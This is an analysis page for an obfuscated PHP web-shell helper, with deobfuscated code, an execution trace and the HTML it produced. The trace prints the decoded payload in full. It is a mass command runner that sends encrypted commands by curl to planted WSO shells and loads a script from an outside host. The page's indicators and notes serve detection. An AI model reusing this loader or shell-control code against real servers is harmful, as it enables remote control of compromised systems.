PHP Malware Analysis

wso_cmd.php

md5: 37c327e9626364a885d9c0ccd02797b4


Screenshot


Attributes

Encoding

Environment

Execution

Input

URLs
  • http://www.r57.gen.tr/yazciz/ciz.js (HTML, Traces)


Deobfuscated PHP code

<?php

// Switches off all PHP error reporting before anything else runs, so a failed
// decode or eval further down is not reported. In the sandbox trace on this
// page the call returns 22527, the level that was in effect before.
error_reporting(0);
/**
 * Decrypts one embedded stage of the loader and returns it as a string.
 *
 * The argument is base64-decoded here and the result is passed to
 * openssl_decrypt() with options 0, so OpenSSL base64-decodes it a second
 * time before decrypting. The cipher name, key and IV are literals in this
 * file, which means an analyst can recover the stage statically by printing
 * the return value instead of evaluating it.
 *
 * NOTE(review): the key literal is 16 bytes while AES-256 takes a 32-byte
 * key; PHP's OpenSSL binding is understood to NUL-pad short keys, so a
 * decoder written outside PHP must pad the same way (confirm for the PHP
 * version in use).
 *
 * @param string $e Base64 text wrapping base64-encoded AES-256-CBC ciphertext.
 * @return string|false Decrypted PHP source, or false when decryption fails.
 */
function e7061($e)
{
    // Outer base64 layer; the trace shows the result is itself base64 text.
    $ed = base64_decode($e);
    // "{$ed}" is plain interpolation and passes the string through unchanged.
    // Key and IV are the same 16-character literal.
    $n = openssl_decrypt("{$ed}", "AES-256-CBC", "1234567891234567", 0, "1234567891234567");
    return $n;
}
$Fls = 'eNqlWVm3msgW%2FksMmtU%2B9ENUQDHUCQVVDG8C5wQFPAZRhF9%2FdxWzmu6%2ByUMtEKg9fHsudRutdRtpoRaXur1UYC11W9dgLYffzXUniHEoG7kpLJBN1De8KlRHQZQq1NoJ%2Fi08FC4R%2FsqJFKeBVuZoNUuNRLmOaQGNm6%2Bl2d6hyU5Sr%2F6qQJ6D0520uO7qrcR4G2sP9nmVsVbmO0GHhePAgW8J%2FtLTqUiJV6Q0rYLstbTeiegYZmkZrQoxlBhtLk8cufgzkPXzewbPZJyGMj4HWZh7zjxhvAJ5m%2FsOFj1JFfbO4uo5ZR5uaBVqi9p3jTyQ5pd3C%2FRQTFhKTk70upNSgcsrp7fI3eaBHMGz%2Bw1oXPawD2RgvOeBTKudjNLw5KfhYaBhWYXgOQXoPL%2FtZB1kWt6CEzp7WXrZu3jeyi7sNQJy6qAPATm8PNLiFOi1eg70Bmznt0ijNdhzOcKpAowUW4Dvj5GwE9DWJPMNBtwsheSUIpUciiUW6BtdFY5J7hRbY9o60MXf7QOpkGiC7eOlnUTqrmL7U3sn%2BktbpSrjuauV2tCUEmU4M%2BxQ9upE9mw9NbLtHZbo2YqMamXuSeT%2B7dDZj8lHKtz%2FvnS8mQ%2BwlVMtPodVkUXO%2FBhp6S04FLIHtonArtEGp%2FD7snfmgCf4inQH%2BxKQe3t%2F9F8fbOcx%2B0szsPn8GJ4AR3Uxg2%2FZEsA3KtB3ze83EfjHdq7b0Wqg0z1HipeptW97gisBTWmR%2BKDD2wow2ixlH65vFqnNkY5og4TwQGqs6THYU0LqIg0yBLFAwC4%2FYOE62mzhmqSGsB0wOGL23YcnxRXjCzJUzUITuZg%2BrtzyAP7Gga%2BpDBqjbZbjvZEUn4NBhjO8WzMcAo1ep7gwLKZ4%2BNmi6r7ZM77rr43sR%2FzzJZ0eU8af76nMdgFe8lRWwFVcHPcMEwE312N8CzNzghci21ZuqjS0qQrxnkx50o6fiBvbPNun4cdoXlucG0wl9Bm%2BwjHZNqu3lXr2D60PcJwJkxvo6RffmT3b%2BJgewozG%2B2pCW2bXp3tXTyPISeDnB89FKTriDyZbIOG003Nk%2F0fdxjR7HSDeYLW5U%2FJF8DGe%2F3ZSHEOsXYOqqALpDjGVQp7Dn3uIt1BC1d5dCiynGNYDTWdMA6eerM%2FDzdRWRmKw%2BzKSTI4BGvv5OhneCfiXek59qPP%2Fr%2FPBT8exCXJMYvMlPuXbk78x%2BbbNepaRx2PH63U8NvLsrVFM9DRSGTC%2F9DJxX0H%2F4CePOKUZ1KzuOxZnirHi%2BgCtz1e0eryH2NRXzXrMb43cY7%2FHGr9Wb9qi4nltwFFseIJ8pLUnoeP45Hzb%2BPw5xOdr2w3%2BO2vxn%2BS9V9h2uWNqSyfN%2BpzE8GeLyZvdoU48%2BUH15uiV76j5M49I%2BdVviFshcnXw8z6XJ74zyeUjH3nUd0z3uS550DMEPc7NvVlx%2F5SgN3n2hyPrb5DA%2FCDU1Ap6nw%2BQ7dJh0N7PH%2BtF4Jhi06swG4sJ6v0Rcqzc2S1qaW%2FlwX5TOuFa%2FehrqUZ5bdyxmsjjH3%2B8d7p08vMcAP1AvYyNtZ%2F4R%2BgJJGOOJKXybf1gwEKOckd1eH9zUAp5htey53q6jMNMLUJxyeTNG76gf6bOW90rr9nL6iHzg8pIopXt3Jem1T5r6yTD1zh9vbdxDLohtbmPVq91jNq4571C5bGceUJptHrgl1KCD8Js%2FG247vKK2dSILs9wXPTjowwmjY5%2Bon4JxDgl9o8hNzXfl0b1wPMw0ilTf3rujwd%2BuhCeaDqS6cmmnvSD11zmOy7k%2F73bxfS4N1Gb99DfRtqijHo7o09GF%2FpMSpL7d6LiDyIiwxV9lSSp5pD4O2QOJn9uPPZJDhIhTj
%2FAh4VAXgqdD3N54HtTpJatLEyqLmwi3D9oQi2L%2BD5RKPSwTOdL%2BagPjyeV9fL4NqpHxz2Pq2JNqW7Y4pK4QqyaBP85HZHamOptP81pMcxRIJ%2Bhz7rHbOZA1qxkNfRNjaBXxbcIZio7NXN0mN0Zz50Yfae1J%2FB7WZdYb41s79rgVWwg1%2BQB7MfHbWnYX9m6w%2Fx1hrwEtYFh5YlAq2xr0%2B%2FqYdm9%2FBjsUv62%2FXGyMMBuLqy1SbHOZxFmf%2Bu37b%2B2hcU3ixD%2BfByro7wmY61I33kN%2Fu9zyZ9htgTfxppFqIFVo5NNYHnZc8SaNHL9rs7EIqJqi5RwfGvjD3xUh4kN6KbYglnQxhBHnCbUq8ghr2aQDPwVckzR5gQ68x1jQn%2Bik7uEmhp9wMze6HFsc9ARgb%2FP0zCJiU3KNpeF7H17RoC0tkeQ2xmh3ltDPkOa1%2FWQs0fdh5o8qQFC6wtNryI1tY3x5D1La5939v6o9H3Mk49L6AJ1MJ3Y5gEjxHTp8Gr2ljCnX6PVpdGxeycg2xR1nahmTkSWf5Gy32AhZD1c15efIjmq5hWyw6sPtfTbic%2Bl2rujfvGk9Au7Z9dv2blu6gQ7w9E1IiDLokvSPOvyOVp7QAPqVtV9y%2Ba2wCoKn52N8H6b6a2btohIW38m%2B8OmttSmjErPmeXQ18z5zNjsywJpLnxz0fk9Y8%2BU3Dguy74Wsn2SfwtOZg69%2BIX3rn1%2FjY5orUD%2BMtoaRcfnR%2FCbxZDP6TOZIKfcAkeMg8zMsRuDbXDKZzOWC09ctnbu4vvKl3pQ9Ok790vI8xqrc4jT30lAW1uMe%2Fraq827Abmjw4RqcRyt2LkOySNJBdsWApuTIsAEdCv4GdWqyMJsUfAzomZOauTLOAZtDeY9%2FyHs8JFx%2Br7BMZsHId%2BzetBh1Nbz4gr5I%2B1kCzk%2Bdy4Xl3vTfy%2B8DbhXqJrxWWKv0Qt8c23jivsK%2BMMsgrzkO8q%2FY%2Fb%2F2XAdSGLRnK8hdv70rP9Yd%2Bgvwg0VIPfMw8GnBN%2BNBa6f7MfBhg66y2kNshdNLFLWv8h7h%2FWrRptLujlnmwfQH%2FpW2%2BdlqPDHPsl95msjzxCbZRcje2deRq6ZR5u07GmckOhl4rnx7QL62bvYv0voDPKv4FvP9gJdUq%2F6N96tr8t6MY7paex2eXE6P%2Bwdj52NnEO56UF5HVYXbTzzs4%2BxDOMzkOHMxfFvzP%2Ba3BaDPy4vo7m7YlgHo97ygb488sl%2BVoBcXLMYgHmLx9zL87SM1pFzF8b1hfGEGfYcDHP7aL%2B%2Bnrx7kMOTxGQ6r7yYWVqefGZgM2cKs627vHhOk%2BM9V688N2nrFqsVqI0d3i8z2ms2P6KqwdF8mDt4zj1th%2F4%2BMYY%2B%2F5jkvNZyXNjZL7089wT9DHv3HbGMNp0sGOREYrDh81nZ48xoMXkOLKepaeAuhfceu57HtMZN5shxrdL5ubClLABRVpPYM3YmNsaNrqAXBT%2BatTHfx%2FP0zBH6AIijJg%2BmeIst9n8BXe%2Bg%2FyAiNf6RvvUf6P%2FqvGx6z76vMVvm33%2F%2FD%2FTvVMI%3D';
// The loader cannot decrypt its stage without the OpenSSL extension, so it
// stops here with a visible HTML message. That literal string is a usable
// grep indicator when hunting for copies of this sample.
if (!function_exists('openssl_decrypt')) {
    die('<h2>Function openssl_decrypt() not found !</h2>');
}
// _FILE_ and _DIR_ are ordinary user constants with single underscores, not
// PHP's __FILE__/__DIR__ magic constants. They are built from getcwd() and
// the basename of $_SERVER['PHP_SELF']; in the sandbox trace they resolve to
// '/var/www/html/uploads/wso_cmd.php' and '/var/www/html/uploads'.
// NOTE(review): no code visible on this page reads either constant.
if (!defined('_FILE_')) {
    define("_FILE_", getcwd() . DIRECTORY_SEPARATOR . basename($_SERVER['PHP_SELF']), false);
}
if (!defined('_DIR_')) {
    define("_DIR_", getcwd(), false);
}
// Encrypted first stage. Per the trace on this page, e7061() turns it into a
// single eval() statement that unwraps $Fls in this order: urldecode,
// base64_decode, gzuncompress, base64_decode, urldecode, and then evaluates
// the result as PHP (prefixed with "?>" so it starts in HTML mode).
$e7091 = "WitRVDRlTnV1UkliMGpLdndRb1NQMW5HK01ESU5nOGRFYWFIc3cvTjNXK054QWozQjB5Z2kzcWdxR3YwWmlTME1FMEREOTZWVWdOcUs1SEJCcUdPc0JRaTU1Tlg0eFQ0aWFMTU4xczVZR2JjWWwyeVJTRFJPTlpydExpN1VZMno=";
// Execution point: everything above only prepares strings. eval() on the
// output of a decrypt call with a constant key is a stable static signal for
// scanners even though the payload text itself is encrypted. The trace ran the
// file from an uploads directory; where the web server does not execute PHP
// from upload paths, this line never runs.
eval(e7061($e7091));

Execution traces

data/traces/37c327e9626364a885d9c0ccd02797b4_trace-1676249657.6871.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:54:43.584920]
1	0	1	0.000167	393528
1	3	0	0.000264	403232	{main}	1		/var/www/html/uploads/wso_cmd.php	0	0
2	4	0	0.000282	403232	error_reporting	0		/var/www/html/uploads/wso_cmd.php	1	1	0
2	4	1	0.000297	403272
2	4	R			22527
1		A						/var/www/html/uploads/wso_cmd.php	1	$Fls = 'eNqlWVm3msgW%2FksMmtU%2B9ENUQDHUCQVVDG8C5wQFPAZRhF9%2FdxWzmu6%2ByUMtEKg9fHsudRutdRtpoRaXur1UYC11W9dgLYffzXUniHEoG7kpLJBN1De8KlRHQZQq1NoJ%2Fi08FC4R%2FsqJFKeBVuZoNUuNRLmOaQGNm6%2Bl2d6hyU5Sr%2F6qQJ6D0520uO7qrcR4G2sP9nmVsVbmO0GHhePAgW8J%2FtLTqUiJV6Q0rYLstbTeiegYZmkZrQoxlBhtLk8cufgzkPXzewbPZJyGMj4HWZh7zjxhvAJ5m%2FsOFj1JFfbO4uo5ZR5uaBVqi9p3jTyQ5pd3C%2FRQTFhKTk70upNSgcsrp7fI3eaBHMGz%2Bw1oXPawD2RgvOeBTKudjNLw5KfhYaBhWYXgOQXoPL%2FtZB1kWt6CEzp7WXrZu3jeyi7sNQJy6qAPATm8PNLiFOi1eg70Bmznt0ijNdhzOcKpAowUW4Dvj5GwE9DWJPMNBt'
2	5	0	0.000341	403232	function_exists	0		/var/www/html/uploads/wso_cmd.php	1	1	'openssl_decrypt'
2	5	1	0.000356	403272
2	5	R			TRUE
2	6	0	0.000370	403232	getcwd	0		/var/www/html/uploads/wso_cmd.php	1	0
2	6	1	0.000384	403280
2	6	R			'/var/www/html/uploads'
2	7	0	0.000399	403280	basename	0		/var/www/html/uploads/wso_cmd.php	1	1	'/uploads/wso_cmd.php'
2	7	1	0.000414	403352
2	7	R			'wso_cmd.php'
2	8	0	0.000428	403296	define	0		/var/www/html/uploads/wso_cmd.php	1	3	'_FILE_'	'/var/www/html/uploads/wso_cmd.php'	FALSE
2	8	1	0.000443	403448
2	8	R			TRUE
2	9	0	0.000456	403328	getcwd	0		/var/www/html/uploads/wso_cmd.php	2	0
2	9	1	0.000469	403376
2	9	R			'/var/www/html/uploads'
2	10	0	0.000483	403376	define	0		/var/www/html/uploads/wso_cmd.php	2	3	'_DIR_'	'/var/www/html/uploads'	FALSE
2	10	1	0.000497	403528
2	10	R			TRUE
1		A						/var/www/html/uploads/wso_cmd.php	2	$e7091 = 'WitRVDRlTnV1UkliMGpLdndRb1NQMW5HK01ESU5nOGRFYWFIc3cvTjNXK054QWozQjB5Z2kzcWdxR3YwWmlTME1FMEREOTZWVWdOcUs1SEJCcUdPc0JRaTU1Tlg0eFQ0aWFMTU4xczVZR2JjWWwyeVJTRFJPTlpydExpN1VZMno='
2	11	0	0.000531	403408	e7061	1		/var/www/html/uploads/wso_cmd.php	2	1	'WitRVDRlTnV1UkliMGpLdndRb1NQMW5HK01ESU5nOGRFYWFIc3cvTjNXK054QWozQjB5Z2kzcWdxR3YwWmlTME1FMEREOTZWVWdOcUs1SEJCcUdPc0JRaTU1Tlg0eFQ0aWFMTU4xczVZR2JjWWwyeVJTRFJPTlpydExpN1VZMno='
3	12	0	0.000551	403408	base64_decode	0		/var/www/html/uploads/wso_cmd.php	1	1	'WitRVDRlTnV1UkliMGpLdndRb1NQMW5HK01ESU5nOGRFYWFIc3cvTjNXK054QWozQjB5Z2kzcWdxR3YwWmlTME1FMEREOTZWVWdOcUs1SEJCcUdPc0JRaTU1Tlg0eFQ0aWFMTU4xczVZR2JjWWwyeVJTRFJPTlpydExpN1VZMno='
3	12	1	0.000570	403664
3	12	R			'Z+QT4eNuuRIb0jKvwQoSP1nG+MDINg8dEaaHsw/N3W+NxAj3B0ygi3qgqGv0ZiS0ME0DD96VUgNqK5HBBqGOsBQi55NX4xT4iaLMN1s5YGbcYl2yRSDRONZrtLi7UY2z'
2		A						/var/www/html/uploads/wso_cmd.php	1	$ed = 'Z+QT4eNuuRIb0jKvwQoSP1nG+MDINg8dEaaHsw/N3W+NxAj3B0ygi3qgqGv0ZiS0ME0DD96VUgNqK5HBBqGOsBQi55NX4xT4iaLMN1s5YGbcYl2yRSDRONZrtLi7UY2z'
3	13	0	0.000610	403632	openssl_decrypt	0		/var/www/html/uploads/wso_cmd.php	1	5	'Z+QT4eNuuRIb0jKvwQoSP1nG+MDINg8dEaaHsw/N3W+NxAj3B0ygi3qgqGv0ZiS0ME0DD96VUgNqK5HBBqGOsBQi55NX4xT4iaLMN1s5YGbcYl2yRSDRONZrtLi7UY2z'	'AES-256-CBC'	'1234567891234567'	0	'1234567891234567'
3	13	1	0.000648	403960
3	13	R			'eval("?>".urldecode(base64_decode(gzuncompress(base64_decode(urldecode($Fls)))))."<?php ");'
2		A						/var/www/html/uploads/wso_cmd.php	1	$n = 'eval("?>".urldecode(base64_decode(gzuncompress(base64_decode(urldecode($Fls)))))."<?php ");'
2	11	1	0.000684	403568
2	11	R			'eval("?>".urldecode(base64_decode(gzuncompress(base64_decode(urldecode($Fls)))))."<?php ");'
2	14	0	0.000715	405344	eval	1	'eval("?>".urldecode(base64_decode(gzuncompress(base64_decode(urldecode($Fls)))))."<?php ");'	/var/www/html/uploads/wso_cmd.php	2	0
3	15	0	0.000732	405344	urldecode	0		/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	1	'eNqlWVm3msgW%2FksMmtU%2B9ENUQDHUCQVVDG8C5wQFPAZRhF9%2FdxWzmu6%2ByUMtEKg9fHsudRutdRtpoRaXur1UYC11W9dgLYffzXUniHEoG7kpLJBN1De8KlRHQZQq1NoJ%2Fi08FC4R%2FsqJFKeBVuZoNUuNRLmOaQGNm6%2Bl2d6hyU5Sr%2F6qQJ6D0520uO7qrcR4G2sP9nmVsVbmO0GHhePAgW8J%2FtLTqUiJV6Q0rYLstbTeiegYZmkZrQoxlBhtLk8cufgzkPXzewbPZJyGMj4HWZh7zjxhvAJ5m%2FsOFj1JFfbO4uo5ZR5uaBVqi9p3jTyQ5pd3C%2FRQTFhKTk70upNSgcsrp7fI3eaBHMGz%2Bw1oXPawD2RgvOeBTKudjNLw5KfhYaBhWYXgOQXoPL%2FtZB1kWt6CEzp7WXrZu3jeyi7sNQJy6qAPATm8PNLiFOi1eg70Bmznt0ijNdhzOcKpAowUW4Dvj5GwE9DWJPMNBt'
3	15	1	0.000769	409472
3	15	R			'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'
3	16	0	0.000804	409440	base64_decode	0		/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	1	'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'
3	16	1	0.000839	413568
3	16	R			'xڥYY���\026�K\f��>�CT@1�\t\005U\fo\002�\004\005<\006Q�_w\025����C-\020�=|{.u\033�u\033i�\026���T`-u[�`-���u\'�q(\033�),�M�7�*TGA�*��\t�-<\024.\021�ʉ\024��V�h5K�D��i\001�����ޡ�NR���@��ӝ�����x\033k\017�y��V�;A���o\t��өH�W�4��쵴މ�\030fi\031�\n1�\030m.O\034��3���{\006�d��2>\aY�{�<a�\002y��\016\026=I\025����9e\036nh\025j��w�<��w\v�PLXJNN�R��+�����\034���\rh\\��\017d`��L�������a�aY��9\005�<��d\035dZނ\023:{Yzٻx��.�5\002r�\017\0019�<��\024�z\016�\006l�H�5�s9©\002�\024[��\023��$�\r\006�,��'
3	17	0	0.000924	409440	gzuncompress	0		/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	1	'xڥYY���\026�K\f��>�CT@1�\t\005U\fo\002�\004\005<\006Q�_w\025����C-\020�=|{.u\033�u\033i�\026���T`-u[�`-���u\'�q(\033�),�M�7�*TGA�*��\t�-<\024.\021�ʉ\024��V�h5K�D��i\001�����ޡ�NR���@��ӝ�����x\033k\017�y��V�;A���o\t��өH�W�4��쵴މ�\030fi\031�\n1�\030m.O\034��3���{\006�d��2>\aY�{�<a�\002y��\016\026=I\025����9e\036nh\025j��w�<��w\v�PLXJNN�R��+�����\034���\rh\\��\017d`��L�������a�aY��9\005�<��d\035dZނ\023:{Yzٻx��.�5\002r�\017\0019�<��\024�z\016�\006l�H�5�s9©\002�\024[��\023��$�\r\006�,��'
3	17	1	0.001042	417664
3	17	R			'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'
3	18	0	0.001078	413536	base64_decode	0		/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	1	'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'
3	18	1	0.001123	421760
3	18	R			'%3C%3Fphp%0D%0A%2F%2A%0D%0A%0D%0A+Mass+COMMAND+EXCUTER+For+WSO+Shell+4.%2A.%2A%0D%0A+Modified+and+Made+on+26%2F06%2F2019+By+DamaneDz%0D%0A+%0D%0A+This+Script+used+for+authorized+testing+and%2For+educational+purposes+only.%0D%0A+Run+it+on+your+own+localhost+or+your+server.%0D%0A+I+take+no+responsibility+for+the+abuse+of+the+script.%0D%0A+%0D%0A+Notes%3A%0D%0A+%2A+DON%27t+CHANGE+THE+USER+AGENT+VALUE.%0D%0A+%2A+DON%27T+CHANGE++THIS+VALUE%3A+130a06df177c97a2e2b12b5a17719ce1.%0D%0A%2A%2F%0D%0A+%0D%0A%2F%2F+This+'
3	19	0	0.001157	413536	urldecode	0		/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	1	'%3C%3Fphp%0D%0A%2F%2A%0D%0A%0D%0A+Mass+COMMAND+EXCUTER+For+WSO+Shell+4.%2A.%2A%0D%0A+Modified+and+Made+on+26%2F06%2F2019+By+DamaneDz%0D%0A+%0D%0A+This+Script+used+for+authorized+testing+and%2For+educational+purposes+only.%0D%0A+Run+it+on+your+own+localhost+or+your+server.%0D%0A+I+take+no+responsibility+for+the+abuse+of+the+script.%0D%0A+%0D%0A+Notes%3A%0D%0A+%2A+DON%27t+CHANGE+THE+USER+AGENT+VALUE.%0D%0A+%2A+DON%27T+CHANGE++THIS+VALUE%3A+130a06df177c97a2e2b12b5a17719ce1.%0D%0A%2A%2F%0D%0A+%0D%0A%2F%2F+This+'
3	19	1	0.001223	421760
3	19	R			'<?php\r\n/*\r\n\r\n Mass COMMAND EXCUTER For WSO Shell 4.*.*\r\n Modified and Made on 26/06/2019 By DamaneDz\r\n \r\n This Script used for authorized testing and/or educational purposes only.\r\n Run it on your own localhost or your server.\r\n I take no responsibility for the abuse of the script.\r\n \r\n Notes:\r\n * DON\'t CHANGE THE USER AGENT VALUE.\r\n * DON\'T CHANGE  THIS VALUE: 130a06df177c97a2e2b12b5a17719ce1.\r\n*/\r\n \r\n// This function was written line by line !\r\n\r\nfunction encrypt_x($str'
3	20	0	0.001397	431760	eval	1	'?><?php\r\n/*\r\n\r\n Mass COMMAND EXCUTER For WSO Shell 4.*.*\r\n Modified and Made on 26/06/2019 By DamaneDz\r\n \r\n This Script used for authorized testing and/or educational purposes only.\r\n Run it on your own localhost or your server.\r\n I take no responsibility for the abuse of the script.\r\n \r\n Notes:\r\n * DON\'t CHANGE THE USER AGENT VALUE.\r\n * DON\'T CHANGE  THIS VALUE: 130a06df177c97a2e2b12b5a17719ce1.\r\n*/\r\n \r\n// This function was written line by line !\r\n\r\nfunction encrypt_x($str,$pwd){\r\n$pwd=base64_encode($pwd);\r\n$str=base64_encode($str);\r\n$enc_chr="";\r\n$enc_str="";\r\n$i=0;\r\nwhile($i<strlen($str)){\r\nfor($j=0;$j<strlen($pwd);$j++){\r\n$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));\r\n$enc_str.=$enc_chr;\r\n$i++;\r\nif($i>=strlen($str))break;\r\n}\r\n}\r\nreturn base64_encode($enc_str);\r\n}\r\n\r\n// This function has no role in this script !\r\n\r\nfunction decrypt($str,$pwd){\r\n\t$pwd=base64_encode($pwd);\r\n\t$str=base64_decode($str);\r\n\t$enc_chr="";\r\n\t$enc_str="";\r\n\t$i=0;\r\n\twhile($i<strlen($str)){\r\n\tfor($j=0;$j<strlen($pwd);$j++){\r\n\t$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));\r\n\t$enc_str.=$enc_chr;\r\n\t$i++;\r\n\tif($i>=strlen($str))break;\r\n\t}\r\n\t}\r\nreturn base64_decode($enc_str);\r\n}\r\n\r\nfunction curl($url,$eval){\r\n$host=parse_url($url);\r\n$md5host=md5($host[\'host\']);\r\n$p1_encrypted= encrypt_x($eval,"130a06df177c97a2e2b12b5a17719ce1");\r\n$paramsPost = array("a"=>"GBMlAA==","p1"=>"{$p1_encrypted}","charset"=>"UTF-8","p2"=>"","c"=>"AWcfAzoXeQ8=","p3"=>"","ajax"=>"true",);\r\n$ch=curl_init();\r\ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\ncurl_setopt($ch, CURLOPT_HEADER, 0);\r\ncurl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0");\r\ncurl_setopt($ch, CURLOPT_URL, $url);\r\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($ch, 
CURLOPT_COOKIE, "{$md5host}key=130a06df177c97a2e2b12b5a17719ce1");\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS, $paramsPost);\r\ncurl_setopt($ch, CURLOPT_TIMEOUT, 30);\r\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n$f = curl_exec($ch);\r\npreg_match("#innerHTML=\'(.*?)\';#i",$f,$x);\r\nreturn array($host[\'host\'], $x[1]);\r\ncurl_close($ch);\r\n}\r\n\r\nprint \'\r\n<SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>\r\n<center><form method="POST">\r\n<p><span style="font-size: 20pt"><font color="#c41013">WSO Shell</font> Command Excuter</span></p>\r\n<p>Shells (<font color="#c41013">That you want to run command from it !</font>)<br><textarea rows="22" name="shells" cols="48">\'.$shells.\'</textarea></p>\r\n<p><font color="#c41013">Command: </font><br><input type="text" value="system(\\\'id\\\');" name="cmd"></p>\r\n<p><input type="submit" value="Excute" name="exec"></p>\r\n</form></center>\';\r\n\r\nif(isset($_POST["exec"])){\r\nforeach(explode("\\n",$_POST[\'shells\']) as $shell){\r\n$result = curl(trim($shell),trim($_POST[\'cmd\']));\r\n$result= str_replace(array(\'\\n\',\'\\r\'),array("<br>","") , $result);\r\nif(!empty($result[0]) && !empty($result[1])){\r\nprint "THE HOST: ".$result[0]."<br>";\r\nprint "THE EXEC RESULT: ".$result[1]."<br>";\r\n}\r\n}\r\n}\r\n;?><?php '	/var/www/html/uploads/wso_cmd.php(2) : eval()'d code	1	0
3	20	1	0.001498	431760
2	14	1	0.001507	426312
1	3	1	0.001515	424456
			0.001554	341144
TRACE END   [2023-02-12 22:54:43.586339]


Generated HTML code

<!--
  Output captured from the sandbox run of the sample.
  The script tag below loads a file over plain HTTP from www.r57.gen.tr, the
  host listed under "URLs" on this page, so a browser that renders this page
  contacts that third-party host; what the remote script does is not shown
  here. Requests for that URL in proxy or DNS logs are an indicator that the
  page was opened.
  The form has no action attribute and therefore posts back to the same URL;
  the POST field names "shells", "cmd" and "exec" can be matched in web
  server or WAF request logs.
-->
<html><head><script src="http://www.r57.gen.tr/yazciz/ciz.js"></script>
</head><body><center><form method="POST">
<p><span style="font-size: 20pt"><font color="#c41013">WSO Shell</font> Command Excuter</span></p>
<p>Shells (<font color="#c41013">That you want to run command from it !</font>)<br><textarea rows="22" name="shells" cols="48"></textarea></p>
<p><font color="#c41013">Command: </font><br><input type="text" value="system('id');" name="cmd"></p>
<p><input type="submit" value="Excute" name="exec"></p>
</form></center></body></html>

Original PHP code

<?php error_reporting(0); function e7061($e){$ed = base64_decode($e);$n = openssl_decrypt("$ed","AES-256-CBC","1234567891234567",0,"1234567891234567");return $n;}$Fls = 'eNqlWVm3msgW%2FksMmtU%2B9ENUQDHUCQVVDG8C5wQFPAZRhF9%2FdxWzmu6%2ByUMtEKg9fHsudRutdRtpoRaXur1UYC11W9dgLYffzXUniHEoG7kpLJBN1De8KlRHQZQq1NoJ%2Fi08FC4R%2FsqJFKeBVuZoNUuNRLmOaQGNm6%2Bl2d6hyU5Sr%2F6qQJ6D0520uO7qrcR4G2sP9nmVsVbmO0GHhePAgW8J%2FtLTqUiJV6Q0rYLstbTeiegYZmkZrQoxlBhtLk8cufgzkPXzewbPZJyGMj4HWZh7zjxhvAJ5m%2FsOFj1JFfbO4uo5ZR5uaBVqi9p3jTyQ5pd3C%2FRQTFhKTk70upNSgcsrp7fI3eaBHMGz%2Bw1oXPawD2RgvOeBTKudjNLw5KfhYaBhWYXgOQXoPL%2FtZB1kWt6CEzp7WXrZu3jeyi7sNQJy6qAPATm8PNLiFOi1eg70Bmznt0ijNdhzOcKpAowUW4Dvj5GwE9DWJPMNBtwsheSUIpUciiUW6BtdFY5J7hRbY9o60MXf7QOpkGiC7eOlnUTqrmL7U3sn%2BktbpSrjuauV2tCUEmU4M%2BxQ9upE9mw9NbLtHZbo2YqMamXuSeT%2B7dDZj8lHKtz%2FvnS8mQ%2BwlVMtPodVkUXO%2FBhp6S04FLIHtonArtEGp%2FD7snfmgCf4inQH%2BxKQe3t%2F9F8fbOcx%2B0szsPn8GJ4AR3Uxg2%2FZEsA3KtB3ze83EfjHdq7b0Wqg0z1HipeptW97gisBTWmR%2BKDD2wow2ixlH65vFqnNkY5og4TwQGqs6THYU0LqIg0yBLFAwC4%2FYOE62mzhmqSGsB0wOGL23YcnxRXjCzJUzUITuZg%2BrtzyAP7Gga%2BpDBqjbZbjvZEUn4NBhjO8WzMcAo1ep7gwLKZ4%2BNmi6r7ZM77rr43sR%2FzzJZ0eU8af76nMdgFe8lRWwFVcHPcMEwE312N8CzNzghci21ZuqjS0qQrxnkx50o6fiBvbPNun4cdoXlucG0wl9Bm%2BwjHZNqu3lXr2D60PcJwJkxvo6RffmT3b%2BJgewozG%2B2pCW2bXp3tXTyPISeDnB89FKTriDyZbIOG003Nk%2F0fdxjR7HSDeYLW5U%2FJF8DGe%2F3ZSHEOsXYOqqALpDjGVQp7Dn3uIt1BC1d5dCiynGNYDTWdMA6eerM%2FDzdRWRmKw%2BzKSTI4BGvv5OhneCfiXek59qPP%2Fr%2FPBT8exCXJMYvMlPuXbk78x%2BbbNepaRx2PH63U8NvLsrVFM9DRSGTC%2F9DJxX0H%2F4CePOKUZ1KzuOxZnirHi%2BgCtz1e0eryH2NRXzXrMb43cY7%2FHGr9Wb9qi4nltwFFseIJ8pLUnoeP45Hzb%2BPw5xOdr2w3%2BO2vxn%2BS9V9h2uWNqSyfN%2BpzE8GeLyZvdoU48%2BUH15uiV76j5M49I%2BdVviFshcnXw8z6XJ74zyeUjH3nUd0z3uS550DMEPc7NvVlx%2F5SgN3n2hyPrb5DA%2FCDU1Ap6nw%2BQ7dJh0N7PH%2BtF4Jhi06swG4sJ6v0Rcqzc2S1qaW%2FlwX5TOuFa%2FehrqUZ5bdyxmsjjH3%2B8d7p08vMcAP1AvYyNtZ%2F4R%2BgJJGOOJKXybf1gwEKOckd1eH9zUAp5htey53q6jMNMLUJxyeTNG76gf6bOW90rr9nL6iHzg8pIopXt3Jem1T5r6yTD1zh9vbdxDLohtbmPVq91jNq4571C5bGceUJptHrgl1KCD8Js%2FG247vKK
